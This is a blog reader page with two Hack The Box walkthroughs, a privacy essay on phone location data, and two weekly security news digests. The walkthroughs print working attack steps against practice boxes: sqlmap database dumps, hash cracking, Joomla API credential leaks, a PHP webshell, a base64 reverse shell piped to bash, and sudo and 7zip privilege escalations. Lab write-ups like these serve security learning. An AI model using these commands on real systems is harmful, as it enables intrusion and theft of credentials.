Infosec Press

Reader

Read the latest posts from Infosec Press.

from 0x2501

Intro

Usage is a retired easy rated box on hackthebox. It features blind SQL injection, the exploitation of a vulnerable laravel plugin, hash cracking and wildcard spares.

Walkthrough

I started with a portscan.

22/tcp open ssh
80/tcp open http

The webserver redirects to usage.htb which I add to /etc/hosts. I then started a subdomain enumeration using ffuf.

ffuf -u 'http://usage.htb' -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.usage.htb" --fw 6

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://usage.htb
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.usage.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 6
________________________________________________

admin                   [Status: 200, Size: 3304, Words: 493, Lines: 89, Duration: 52ms]
:: Progress: [4989/4989] :: Job [1/1] :: 909 req/sec :: Duration: [0:00:02] :: Errors: 0 ::

I get a hit on admin and add admin.usage.htb to /etc/hosts.

Having done some automatic enumeration, I start having a look at the base domain. I tested the account creation form for some basic sql injection, mainly just inputting single quotes – nothing there. I then created an account and tested the /forgot-password endpoint for some basic injection techniques. Inputting a ' returns a 500 – Internal Server Error which made be believe to have found a blind SQL injection.

I intercepted the request with Burp Suite, saved it to a file and then ran sqlmap using that request.

sqlmap -r forgot_pass.req

This gained me the following information: – Backend: MySQL > 5.0.12 – Blind Injectable – 8 Columns

Which is not that much but a start, especially considering that I just ran a tool. It's also a really good idea to RTFM, which leads to the following chain of commands (This takes a while to run!).

I first enumerated the used database, which gets me usage_blog.

sqlmap -r forgot_pass.req --dbms=mysql --level 5 --risk 3 --technique BUT -v 7 --batch -p email -current-db

I then enumerated all tables, which gets me admin_users as an interesting table.

sqlmap -r forgot_pass.req --dbms=mysql --level 5 --risk 3 --technique BUT -v 7 --batch -p email -D usage_blog --tables 

I then dump the table admin_users.

sqlmap -r forgot_pass.req --dbms=mysql --level 5 --risk 3 --technique BUT -v 7 --batch -p email -D usage_blog -T admin_users --dump

This gained me the following entry $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2,admin

Taking a look at the hashcat example hashes page or using a script like hashid shows, that it's a bcrypt hash.

hashcat -m 3200 admin_db_hash /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt

This gains admin:whatever1 which I used to login into the web application.

The only thing that looked kind of interesting was the ability to upload a profile picture. I did some research on the displayed packages which lead me to CVE-2023-24249.

I used Burp Suite to proxy my requests and just followed the PoC. I had to activate the Option Follow Redirects in the Repeater Tab. Using the uploaded webshell can be a bit tricky because theres a cleanup script running which deletes the shell.

I am now logged in as dash, which gains me the user flag. The file .monitrc kind of sticks out. Having a look at the file I gain another set of credentials: admin:3nc0d3d_pa$$w0rd. I then looked for other users on that box.

cat /etc/passwd | grep -e "$sh"

Another user is xander. I tried using the pillaged password to login as xander, which worked.

Executing sudo -l shows that xander is allowd to run exactly one binary as root. One function of this binary is backing up the website. It uses 7zip to do so, which I can exploit.

  1. Create the file @root.txt in /var/www/html
  2. Create a symlink ln -s -r /root/root.txt root.txt in /var/www/html
  3. Execute the application. It will now output the root flag.
 
Read more...

from Tai Lam on a Bike

I've sat in enough public meetings for municipal projects to know that there aren't enough literal sensors (yet) to differentiate between walkers, bikers, and motor vehicle drivers. However, a heuristic “hack” around this limitation is to use cell phone location data.

Apparently, it's a common practice for traffic studies to use cell phone location data to estimate the number of walkers, bikers, and drivers. This is just one method used by local transportation planners.

Your cell phone's location is being tracked all the time by the SIM card-based technology in it (or the eSIM equivalent, if you've been bamboozled by the iPhone 14 or newer iPhones that only use eSIM).

I remember an excerpt from The Daily Show With Trevor Noah in February 2020 about how a German artist pulled 99 smartphones in a wagon (with active cellular service, and presumably signed into a Google account) to create a fake traffic jam outside the German Google headquarters.

(Noah's comedic pretext for entering this line of thought was that there are traffic jams everywhere else now — as in, away from major roadways — due to the Waze app. Ironically, Google also owns Waze, so it's not like one can really escape car traffic in this regard.)

What I described above is what came to mind when I saw this video/article from CBS Boston, which mentions that Boston has the eighth worse traffic delays in the world. This news segment covers how Boston is 1 of 2 cities in the U.S. currently participating in the AI-based Project Green Light program from Google; which will manage traffic lights at intersections (as of August 9, 2024). (The other city at this time is Seattle, which is a bit obvious, as this is the largest international city closest to Microsoft's headquarters in Redmond, WA.)

Meanwhile, all I have on my mind is a linear combination of: Skynet taking over the world in the Terminator films; AM from the 1995 video game adaptation of I Have No Mouth, and I Must Scream (also where Russia and China have their own supercomputers — and these two other countries also pose critical cybersecurity threats IRL, as of August 2024); and how players can create traffic jams via their smartphones to stop pursuers while driving in the Watch Dogs video game series.

Though to be honest, the last Watch Dogs reference is probably the idea that's most likely to come true IRL, at least in the short-term future.

Also, this traffic sounds a bit of greenwashing, as indicated in The Hated One's videos on water depletion from December 2021 regarding data centers in general requiring lots of water for cooling, and in April 2024 regarding AI data centers specifically.

Conclusion

The TV show Mr. Robot was right, leave your cell phone at home (i.e., still keep it turned on, but not with you when doing a surveillance detection route).

Your cell phone carrier will definitely sell cell phone location data to make a profit off from you, and this isn't even due to any legitimate law enforcement request. (Sorry, FISA court requests don't count, at least to the EFF.) Your cell phone location data points are being sold to mapping services, bounty hunters, and probably some other unscrupulous entities. (The NSA doesn't even need to make its first-party interception set ups anymore; instead, it simply buys internet data as a downstream technique in line with “harvest now, decrypt later”.)

Though to be fair, you as the cell phone network user likely allowed this to happen legally, it's probably hidden somewhere in your carrier's terms of service and/or privacy policy, which you signed when you signed up for your cell phone plan.

 
Read more...

from 📰wrzlbrmpft's cyberlights💥

A weekly shortlist of cyber security highlights. The short summaries are AI generated! If something is wrong, please let me know!


News For All

❌ Here’s How To Stop X From Using Your Data To Train Its AI privacy – X.ai, affiliated with Elon Musk's X network, utilizes Twitter data for AI training; users can opt out in settings. https://www.forbes.com/sites/johnkoetsier/2024/07/26/x-just-gave-itself-permission-to-use-all-your-data-to-train-grok/

®️ Massenüberwachung als Dienstleistung: Der Handel mit Standortdaten privacy – Data brokers sell billions of location data, threatening privacy and national security, leading to concerns about espionage. Commercial surveillance infrastructure poses systemic problems. https://www.kuketz-blog.de/massenueberwachung-als-dienstleistung-der-handel-mit-standortdaten/

🫥 New Mandrake Android spyware version discovered on Google Play malware – Mandrake spyware resurfaces on Google Play with new evasion techniques, targeting users globally. Sophisticated malware embedded in file sharing app, using complex infection chain and anti-analysis methods. https://securelist.com/mandrake-apps-return-to-google-play/113147/

🖖 IBM, Nike, Disney, others caught in Proofpoint phish palaver security news – Phishing campaign exploited Proofpoint security gap, sending 3 million daily spoofed emails; blamed on insecure Proofpoint Microsoft 365 integration. https://www.theregister.com/2024/07/30/scammers_spoofed_emails/

🎣 A crafty phishing campaign targets Microsoft OneDrive users security news – A phishing campaign targets Microsoft OneDrive users with a PowerShell script through a deceptive email instructing users to fix a fake “Error 0x8004de86.” The attack tricks victims into running malicious commands for system compromise. https://securityaffairs.com/166312/hacking/microsoft-onedrive-phishing.html

🦈 'LockBit of phishing' EvilProxy used in 1M+ attacks monthly security news – EvilProxy, a phishing-as-a-service kit, leverages Cloudflare services to disguise traffic in phishing attacks targeting C-Suite executives. Attacks use redirection through legitimate sites, culminating in phishing Microsoft login pages. https://www.theregister.com/2024/07/30/evilproxy_phishing_kit_analysis/

🤑 Meta to pay Texas $1.4 billion to settle lawsuit alleging it illegally captured users’ faces privacy – Meta agrees to pay Texas $1.4 billion to settle a lawsuit over unauthorized use of facial recognition software on users, violating Texas law and consumer protection regulations. https://therecord.media/meta-texas-facial-recognition-settlement

🦆 Don’t Let Your Domain Name Become a “Sitting Duck” security news – Over a million vulnerable domains are at risk of takeover due to authentication weaknesses at hosting providers and registrars, allowing possible cybercriminal exploitation. https://krebsonsecurity.com/2024/07/dont-let-your-domain-name-become-a-sitting-duck/

💸 Scammer Allegedly Makes $600,000 a Month Holding Instagram Accounts Hostage cybercrime – Idriss Qibaa, aka 'Dani' and 'Unlocked,' allegedly extorted victims through locking their Instagram accounts, threatening them, demanding money to regain access, and using personal information for extortion. https://www.404media.co/unlocked4life-instagram-scam-no-jumper/

🧑‍💼 Germany summons Chinese ambassador over cyberattack on cartography agency security news – German authorities link a Beijing-backed threat actor to a 2021 cyberattack on the Federal Agency for Cartography and Geodesy, summoning the Chinese ambassador. https://therecord.media/germany-summons-chinese-ambassador-over-hack

🌐 Nearly 7% of Internet Traffic Is Malicious security news – Cloudflare reports 6.8% of Internet traffic is malicious, with CVEs exploited as quickly as 22 minutes after proof-of-concepts are published. https://www.schneier.com/blog/archives/2024/07/nearly-7-of-internet-traffic-is-malicious.html

🪝 Microsoft seizes domain used by Vietnamese group to sell fake accounts, services cybercrime – Microsoft seizes domain used by Vietnamese group selling fake accounts and services after previous seizures for creating fraudulent Microsoft accounts and CAPTCHA bypass services. https://cyberscoop.com/microsoft-seizes-domain-used-by-vietnamese-group-to-sell-fake-accounts-services/

💐 Begging for Bounties and More Info Stealer Logs cybercrime – Fraudsters try to extort bug bounties using stolen credentials from info stealer logs, which originated from victims' malware-infected devices, creating a malicious chain propagated on platforms like Telegram. https://www.troyhunt.com/begging-for-bounties-and-more-info-stealer-logs/ Personal comment: HIBP added a lot of new breaches this week – go check your accounts at https://haveibeenpwned.com/

💸 $75 Million Record-Breaking Ransom Paid To Cybercriminals, Say Researchers cybercrime – A record-breaking $75 million ransom was paid to Dark Angels ransomware group by an undisclosed Fortune 50 company. https://www.tripwire.com/state-of-security/75-million-record-breaking-ransom-paid-cybercriminals-say-researchers

💊 Pharma Giant Cencora confirmed the theft of personal and health information data breach – Pharmaceutical giant Cencora confirms theft of personal and health information in a data breach, affecting individuals' data, including personally identifiable information and protected health information. https://securityaffairs.com/166422/data-breach/cencora-confirmed-theft-pii-heath-data.html

📱 Keeping your Android device safe from text message fraud privacy – SMS Blaster fraud, threats from SMS phishing via cell-site simulators, and Android security features against fraud. https://security.googleblog.com/2024/08/keeping-your-android-device-safe-from.html

🚗 Ford wants patent for tech allowing cars to surveil and report speeding drivers privacy – Ford seeks patent for cars to surveil speeding drivers, sparking privacy concerns from advocates and experts. https://therecord.media/ford-seeks-patent-cars-surveil-speeders-report-to-police

🏈 NFL to roll out facial authentication software league-wide privacy – The NFL will implement facial authentication software at all 32 stadiums this season to enhance event security. The technology aims to streamline authentication processes for media, officials, and staff. Privacy concerns, noting potential inaccuracies and discriminatory impacts of facial recognition technology. https://therecord.media/nfl-to-roll-out-facial-authentication-league-wide

📇 Hackers attempt to sell the personal data of 3 billion people resulting from an April data breach data breach – National Public Data, reportedly exposed the personal data of close to 3 billion people, disclosed by a threat actor named USDoD, who tried to sell the database for $3.5 million on the dark web. https://securityaffairs.com/166539/data-breach/personal-data-3-billion-people-data-breach.html


Some More, For the Curious

🌀 StormBamboo Compromises ISP to Abuse Insecure Software Update Mechanisms security research – StormBamboo leverages ISP compromise to manipulate DNS updates, installing malware through insecure software updates on macOS and Windows. https://www.volexity.com/blog/2024/08/02/stormbamboo-compromises-isp-to-abuse-insecure-software-update-mechanisms/

🚀🖨️ Reverse engineering the 59-pound printer onboard the Space Shuttle geeky news – The Space Shuttle's Interim Teleprinter, a stop-gap measure, remained in use for over 50 flights, printing thousands of lines; cost $1.5 million per flight. https://www.righto.com/2024/08/space-shuttle-interim-teleprinter.html

😞 Too big to care? – Our disappointment with Cloudflare’s anti-abuse posture cyber defense – Spamhaus criticizes Cloudflare for facilitating cybercriminal activity by providing services to abusive actors, despite having tools to prevent abuse. Calls for Cloudflare to suspend services to abusers. https://www.spamhaus.org/resource-hub/service-providers/too-big-to-care-our-disappointment-with-cloudflares-anti-abuse-posture/

🤖 Websites are Blocking the Wrong AI Scrapers (Because AI Companies Keep Making New Ones) security news – Website owners struggling to block AI scrapers due to constantly changing crawler names and outdated robots.txt files. https://www.404media.co/websites-are-blocking-the-wrong-ai-scrapers-because-ai-companies-keep-making-new-ones/

⚙️ Zero Day Initiative — Breaking Barriers and Assumptions: Techniques for Privilege Escalation on Windows: Part 1 security research – “Link following” vulnerabilities on Windows involve applications improperly resolving filenames, allowing malicious users to redirect to unintended resources. Techniques to exploit these vulnerabilities using file operations are discussed with defensive strategies from developers. https://www.thezdi.com/blog/2024/7/29/breaking-barriers-and-assumptions-techniques-for-privilege-escalation-on-windows-part-1

✈️ Delta Air Lines may sue CrowdStrike, Microsoft over outage security news – Delta Air Lines considers legal action against CrowdStrike and Microsoft following operational losses of up to $500 million due to a recent outage that led millions of Windows machines offline. https://www.theregister.com/2024/07/30/crowdstrike_delta_microsoft_lawsuit/

🌋 'Error' in Microsoft's DDoS defenses amplified Azure outage security news – Microsoft's DDoS defenses amplified an Azure outage caused by a DDoS attack, triggering global service disruptions, despite the company's unique defense and threat intelligence capabilities. https://www.theregister.com/2024/07/31/microsoft_ddos_azure/

🌽 Driving lessons: The kernel drivers in Sophos Intercept X Advanced security research – Sophos Intercept X Advanced uses five kernel drivers for cybersecurity, explaining their functionality, security measures, customer options, gradual rollouts for software updates, and vulnerabilities working in kernel-space. https://news.sophos.com/en-us/2024/08/01/driving-lessons-the-kernel-drivers-in-sophos-intercept-x-advanced/

💵 Leaked ransomware variants give rise to new cybercrime groups cybercrime – Cybercriminals exploit leaked ransomware variants, forming groups utilizing multiple ransomware families for attacks and demanding bug bounties, leading to a rise in cybercrime and affiliate programs. https://securelist.com/sexi-key-group-mallox-ransomware/113183/

🛋️ Education in Secure Software Development security news – Survey by Linux Foundation and OpenSSF shows developers lack essential secure software development skills, raising concerns about software security. https://www.schneier.com/blog/archives/2024/08/education-in-secure-software-development.html

👿 Millions of Websites Susceptible to XSS Attack via OAuth Implementation Flaw vulnerability – Millions of websites vulnerable to XSS attack via OAuth due to flawed implementation, potentially leading to full account takeovers. https://www.securityweek.com/millions-of-websites-susceptible-xss-attack-via-oauth-implementation-flaw/

🛜 WifiForge – WiFi Exploitation for the Classroom hacking write-up – WifiForge, a program allowing safe WiFi hacking lessons through an interactive virtual network platform called Mininet-Wifi. WifiForge facilitates teaching various exploits with pre-built labs, such as WEP key-cracking, eliminating the need for physical network gear. https://www.blackhillsinfosec.com/wififorge/

🧐 One Does Not Simply … Get a Cybersecurity Job security news – Getting a cybersecurity job requires upskilling, certifications, networking, staying informed on trends, and focusing on job opportunities from within your network. https://www.guidepointsecurity.com/blog/one-does-not-simply-get-a-cybersecurity-job/


CISA Corner

⚠️ CISA Adds Three Known Exploited Vulnerabilities to Catalog vulnerability – CISA adds three actively exploited vulnerabilities to catalog: ServiceNow input validation issues and Acronis default password flaw. https://www.cisa.gov/news-events/alerts/2024/07/29/cisa-adds-three-known-exploited-vulnerabilities-catalog ⚠️ CISA Adds One Known Exploited Vulnerability to Catalog vulnerability – CVE-2024-37085 VMware ESXi Authentication Bypass. https://www.cisa.gov/news-events/alerts/2024/07/30/cisa-adds-one-known-exploited-vulnerability-catalog

🍏 Apple Releases Security Updates for Multiple Products vulnerability – Apple issued security updates for Safari, iOS, iPadOS, macOS, watchOS, tvOS, and visionOS. https://www.cisa.gov/news-events/alerts/2024/07/30/apple-releases-security-updates-multiple-products

⏰ DigiCert Certificate Revocations security news – DigiCert is revoking TLS certificates due to a domain control verification issue, potentially causing temporary disruptions, with updated information available on their status page. https://www.cisa.gov/news-events/alerts/2024/07/30/digicert-certificate-revocations

🧑‍🏭 CISA Releases Nine Industrial Control Systems Advisories vulnerability – vulnerabilities in various systems like Johnson Controls, AVTECH IP Camera, Vonets WiFi Bridges, and Rockwell Automation Logix Controllers. https://www.cisa.gov/news-events/alerts/2024/08/01/cisa-releases-nine-industrial-control-systems-advisories

 
Read more...

from 0x2501

Intro

Devvortex is a retired, easy rated box on hackthebox. It features exploitation of a content management system, hash cracking and exploiting an application to escalate privileges on a linux machine.

Walktrough

Enumeration

Let's start with an nmap scan.

22 open ssh
80 open http

Accessing the webserver at port 80 redirects us to devvortex.htb, so let's add this one to /etc/hosts/. The site doesn't look too interesting. Maybe there are other sites hosted here.

Using ffuf to enumerate other sites:

ffuf -u http://devvortex.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -H 'Host: FUZZ.devvortex.htb' --fw 4

We get a hit on dev.devvortex.htb, so let's add that to our hosts file.

Before starting any sort of manual enumeration, let's fuzz for some interesting endpoints:

ffuf -u http://dev.devvortex.htb/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt --fs 162

We get a hit on /administrator. Navigating to that endpoint shows that Joomla is used as a CMS. A way to enumerate the Joomlas version is accessing the joomla.xml file, which is usually atadministrator/manifests/files/joomla.xml Acessing this file, shows that Joomla version 4.2.6 is running.

Conducting a quick search, we find out that this version is vulnerable to CVE-2023-23752 for which public exploits exist.

Exploiting a vulnerable Joomla version

Let's have a quick look at the exploit:

[...]
def fetch_users(root_url, http)
  vuln_url = "#{root_url}/api/index.php/v1/users?public=true"
  http.get(vuln_url)
end
[...]
def fetch_config(root_url, http)
  vuln_url = "#{root_url}/api/index.php/v1/config/application?public=true"
  http.get(vuln_url)
end
[...]

Seems like we just have to access these endpoints.

curl -s http://dev.devvortex.htb/api/index.php/v1/users?public=true | jq
[...]
  "data": [
    {
      "type": "users",
      "id": "649",
      "attributes": {
        "id": 649,
        "name": "lewis",
        "username": "lewis",
        "email": "lewis@devvortex.htb",
        "block": 0,
        "sendEmail": 1,
        "registerDate": "2023-09-25 16:44:24",
        "lastvisitDate": "2023-10-29 16:18:50",
        "lastResetTime": null,
        "resetCount": 0,
        "group_count": 1,
        "group_names": "Super Users"
      }
    },
[...]
curl -s http://dev.devvortex.htb/api/index.php/v1/config/application?public=true | jq
[...]
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "user": "lewis",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "password": "P4ntherg0t1n5r3c0n##",
        "id": 224
      }
[...]

I only included the interesting bits. Using the leaked credentials we are able to login.

Gaining RCE on the box

As an admin we can add code to various templates. I decided to add a webshell to error.php and then use it to gain a reverse shell.

Webshell:

<?php echo Text::_(system($_GET['cmd'])); ?>

Accessing the webshell: http://dev.devvortex.htb/media/templates/site/cassiopeia/js/main.js?cmd=$COMMAND

Reverse Shell

echo "$base64_encoded_reverse_shell" | base64 -d | bash

Host Enumeration

We can already assume that some sort of database is running, but let's confirm this by running netstat -tulnp. This shows that a database service is listening on it's default port. We can connect to it by using lewis' credentials. Then just dump the user table.

Dumping Credentials and cracking hashes

mysql> select * from sd4fg_users;

lewis:$2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u
logan:$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12

Let's check if a user named logan exists on this box, grep logan /etc/passwd. Logan is a user on this machine.

I decided to use john to crack Logans hash.

john --format=bcrypt hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status

tequieromucho    (?)    

1g 0:00:00:05 DONE (2024-04-13 16:24) 0.1992g/s 279.6p/s 279.6c/s 279.6C/s lacoste..harry
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

This gains us logan:tequieromucho.

User Enumeration

Running sudo -l shows that logan is allowed to run apport-cli using sudo. A quick search on howto abuse this, shows that we might be able to abuse CVE-2023-1326 to gain root privileges.

I just wanted to be sure that apport doesn't crash or something so I first generated a valid crash report.

sudo /usr/bin/apport-cli -f --pid 17932 --save /var/crash/ex.crash && 
sudo /usr/bin/apport-cli -c /var/crash/ex.crash
!/bin/bash

We are now root.

 
Read more...

from 📰wrzlbrmpft's cyberlights💥

A weekly shortlist of cyber security highlights. The short summaries are AI generated! If something is wrong, please let me know!


News For All

🧑‍💻 Double Dipping Cheat Developer Gets Caught Red-Handed security research – EvolvedAim cheat developer includes information stealer, targeting Escape From Tarkov players, double-dipping into profits, and causing significant damage. https://www.cyberark.com/resources/threat-research-blog/double-dipping-cheat-developer-gets-caught-red-handed

🔂 Anyone can Access Deleted and Private Repository Data on GitHub security research – GitHub exposes deleted and private repository data, posing security risks through Cross Fork Object Reference (CFOR) vulnerability. https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github

👻 A Hacker ‘Ghost’ Network Is Quietly Spreading Malware on GitHub security research – A network of 3,000 'ghost' accounts on GitHub spreading ransomware and info stealers using fake likes and shares. https://www.wired.com/story/github-malware-spreading-network-stargazer-goblin/

🗳️ Understanding the Election Cybersecurity Landscape cyber defense – Complex election cybersecurity landscape includes diverse targets, tactics, and actors; understanding essential for safeguarding democracy. https://www.greynoise.io/blog/understanding-the-election-cybersecurity-landscape

💰 Oracle coughs up $115M to make privacy case go away privacy – Oracle settles $115 million class action lawsuit over alleged misuse of user data, promising privacy improvements. https://www.theregister.com/2024/07/22/oracle_settles_privacy_case/

📲 Telegram 0-day allowed sending malicious APKs disguised as videos security news – ESET discovers Telegram Android zero-day exploit EvilVideo, allowing attackers to send malicious APKs disguised as videos. https://securityaffairs.com/166042/hacking/evilvideo-telegram-android-zero-day.html

🎲 Chinese ‘cybercrime syndicate’ behind gambling sites advertised at European sporting events cybercrime – Infoblox uncovers Chinese cybercrime syndicate Vigorish Viper behind illegal global gambling network connected to human trafficking and cyber fraud. https://therecord.media/chinese-cybercrime-syndicate-gambling-football-europe

🍪 Google abandons plan to drop third-party cookies in Chrome privacy – Google opting for user choice between Privacy Sandbox and cookies amidst concerns of competitive distortion. https://www.theregister.com/2024/07/23/google_cookies_third_party_continue/

📲 iOS 17: Von einem iPhone kontaktierte Domains privacy https://www.kuketz-blog.de/ios-17-von-einem-iphone-kontaktierte-domains/

🥶 Simple ‘FrostyGoop’ malware responsible for turning off Ukrainians’ heat in January attack security research – Simple but impactful FrostyGoop malware uses Modbus protocol to disrupt heating in Ukrainian apartment buildings, showcasing attackers' focus on critical infrastructure. https://cyberscoop.com/frostygoop-ics-malware-dragos-ukraine/

💥 Inside the 78 minutes that took down millions of Windows machines security news – A faulty update by cybersecurity company CrowdStrike caused global Windows crashes, affecting millions of machines due to a driver flaw. Prospects to avoid such tech disasters involve enabling intelligent boot logic and limiting third-party kernel access. https://www.theverge.com/2024/7/23/24204196/crowdstrike-windows-bsod-faulty-update-microsoft-responses

🪼 AI-Powered Voice Spoofing for Next-Gen Vishing Attacks security research – AI-powered voice cloning advancements enable more realistic vishing attacks, posing significant security risks. Mandiant Red Team incorporated AI voice spoofing in testing, showcasing attackers' potential to exploit this technique for initial access, lateral movement, and privilege escalation. Security defenses must adapt through identifying inconsistencies, source verification, and implementing audio protection measures. https://cloud.google.com/blog/topics/threat-intelligence/ai-powered-voice-spoofing-vishing-attacks/

🤑 TracFone to pay $16 million to settle FCC cyber and privacy investigation security news – TracFone Wireless, owned by Verizon, will pay a $16 million fine to settle an FCC investigation into data breaches caused by API vulnerabilities. The breaches exposed customer data, leading to privacy compromises, necessitating improved API security measures and overall information security protocols. https://therecord.media/tracfone-16-million-to-settle-fcc-investigation

🗺️ Friendly Domain Registry “.top” Put on Notice security news – ICANN has issued a warning to the .top domain registry, expressing concerns over its failure to address phishing reports and suspend abusive domains, with reports showing .top domains were popular choices for phishing websites. https://krebsonsecurity.com/2024/07/phish-friendly-domain-registry-top-put-on-notice/

🎰 Philippines to end online casinos, maybe scams too cybercrime – The Philippines aims to shut down online gambling providers embroiled in crimes like tax evasion and human trafficking. Despite economic benefits, the industry faces international pressure due to illicit activities such as scams and exploitation. https://www.theregister.com/2024/07/24/phillipines_bans_online_gambling_operators/

🦸 Google's reCAPTCHA v2 just labor exploitation, boffins say security research – Researchers criticize Google's reCAPTCHA v2, suggesting it exploits human labor without providing significant security benefits, raising concerns about information harvesting and user experience. https://www.theregister.com/2024/07/24/googles_recaptchav2_labor/

🚸 School in hot water over facial recognition in canteen privacy – ICO reprimands a UK school for introducing facial recognition for canteen payments without proper assessments, consent, or consultation, highlighting the importance of data protection in new technologies at educational institutions. https://www.theregister.com/2024/07/24/essex_school_facial_recognition/

🧪 CrowdStrike blames test software for taking down 8.5 million Windows machines security news – CrowdStrike attributes the issue that caused 8.5 million Windows machines to crash to a bug in their test software that failed to properly validate a content update, leading to detailed post-incident corrective measures for improved testing and deployment processes. https://www.theverge.com/2024/7/24/24205020/crowdstrike-test-software-bug-windows-bsod-issue

🍆 SEXi / APT Inc Ransomware – What You Need To Know cybercrime – The SEXi ransomware group targets VMware ESXi servers, encrypting virtual machine-related files and demanding high ransoms. Victims' files are appended with '.SEXi' and a ransom note named SEXi.txt is left. No known weaknesses exist for data recovery. Protection includes updating systems, disabling default accounts, and using strong, unique passwords. https://www.tripwire.com/state-of-security/sexi-apt-inc-ransomware-what-you-need-know

🎮 LummaC2 Malware Abusing the Game Platform 'Steam' security research – LummaC2 malware disguised as illegal programs uses SEO poisoning and abuse of Steam to acquire C2 domains, targeting wallets, browsers, extensions, and more. https://asec.ahnlab.com/en/68309/


Some More, For the Curious

🔭 Astronomers discover technique to spot AI fakes using galaxy-measurement tools security research – University of Hull researchers use astronomy tools to detect AI-generated deepfake images by analyzing eye reflections for inconsistencies. https://arstechnica.com/information-technology/2024/07/astronomers-discover-technique-to-spot-ai-fakes-using-galaxy-measurement-tools/

🙋‍♂️ Ransomware takedowns leave crims scrambling for stability security news – Europol reports ransomware landscape fragmentation post RaaS disruptions, with criminals adapting by working independently or developing own payloads. https://www.theregister.com/2024/07/22/europol_says_ransomware_takedowns_make/

⛔ DDoS-for-hire site DigitalStress taken down by police, suspected owner arrested cybercrime – DDoS-for-hire site DigitalStress taken down by police, data collected from users, suspected owner arrested in Northern Ireland. https://www.bitdefender.com/blog/hotforsecurity/ddos-for-hire-site-digitalstress-taken-down-by-police-suspected-owner-arrested/

💼 Cyber firm KnowBe4 hired a fake IT worker from North Korea security news – KnowBe4 discovered a North Korean threat actor posing as a remote IT worker through an elaborate deception involving stolen identities and AI-augmented imagery, prompting an investigation and alerting authorities as part of the response. https://cyberscoop.com/cyber-firm-knowbe4-hired-a-fake-it-worker-from-north-korea/

🏝️ Unfashionably secure: why we use isolated VMs cyber defense – Canary's security architecture relies on isolated VMs for complete customer data separation, safeguarding against unauthorized access and ensuring individual tenant privacy, despite operational drawbacks. https://blog.thinkst.com/2024/07/unfashionably-secure-why-we-use-isolated-vms.html

🥼 Build a Home Lab: Equipment, Tools, and Tips cyber defense – Building a home lab with virtual machines allows for experimentation and learning in a safe environment, emphasizing the importance of commitment over expensive equipment. Fundamental components include network setup, virtual machines, and physical hardware, and key considerations include VM options, equipment needs, and backup strategies. https://www.blackhillsinfosec.com/build-a-home-lab-equipment-tools-and-tips/

🪖 North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime’s Military and Nuclear Programs cybercrime – North Korea's Andariel cyber group targets aerospace, nuclear, and defense industries for espionage, using ransomware to fund operations. Known for sophisticated reconnaissance, custom and commodity malware, system manipulation, credential theft, lateral movement, and data exfiltration. https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a

🌊 Zero Day Initiative — Multiple Vulnerabilities in the Deep Sea Electronics DSE855 security research – ZDI reported multiple vulnerabilities in Deep Sea Electronics DSE855, prompting no response from the vendor and leading to zero-day disclosure in June. Lack of authentication in configuration backup allowed unauthorized access. https://www.thezdi.com/blog/2024/7/25/multiple-vulnerabilities-in-the-deep-sea-electronics-dse855

🔐 Secure Boot is completely broken on 200+ models from 5 big device makers vulnerability – Cryptographic key underpinning Secure Boot compromised in 2022, allowing an unlimited bypass on over 200 device models from major manufacturers. Serious doubts raised about the integrity of Secure Boot. https://arstechnica.com/security/2024/07/secure-boot-is-completely-compromised-on-200-models-from-5-big-device-makers/

🗣️ Microsoft calls for Windows changes and resilience after CrowdStrike outage security news – Microsoft calls for Windows changes for resilience after CrowdStrike outage, considering restricting kernel access for security vendors. https://www.theverge.com/2024/7/26/24206719/microsoft-windows-changes-crowdstrike-kernel-driver

💉 French authorities launch disinfection operation to eradicate PlugX malware from infected hostss security news – French authorities and Europol conduct a 'disinfection operation' against PlugX malware, addressing espionage activities with insights from cybersecurity firm. https://securityaffairs.com/166213/cyber-crime/plugx-malware-disinfection-operation.html


CISA Corner

🧑‍🏭 CISA Releases Four Industrial Control Systems Advisories vulnerability – CISA issues advisories on current ICS security issues for National Instruments and Hitachi products https://www.cisa.gov/news-events/alerts/2024/07/23/cisa-releases-four-industrial-control-systems-advisories vulnerability – CISA issued advisories for Siemens SICAM and Positron Broadcast Signal Processor. https://www.cisa.gov/news-events/alerts/2024/07/25/cisa-releases-two-industrial-control-systems-advisories

⚠️ CISA Adds Two Known Exploited Vulnerabilities to Catalog vulnerability – CISA adds two known exploited vulnerabilities to its catalog: CVE-2012-4792 affecting Microsoft Internet Explorer and CVE-2024-39891 affecting Twilio Authy. https://www.cisa.gov/news-events/alerts/2024/07/23/cisa-adds-two-known-exploited-vulnerabilities-catalog

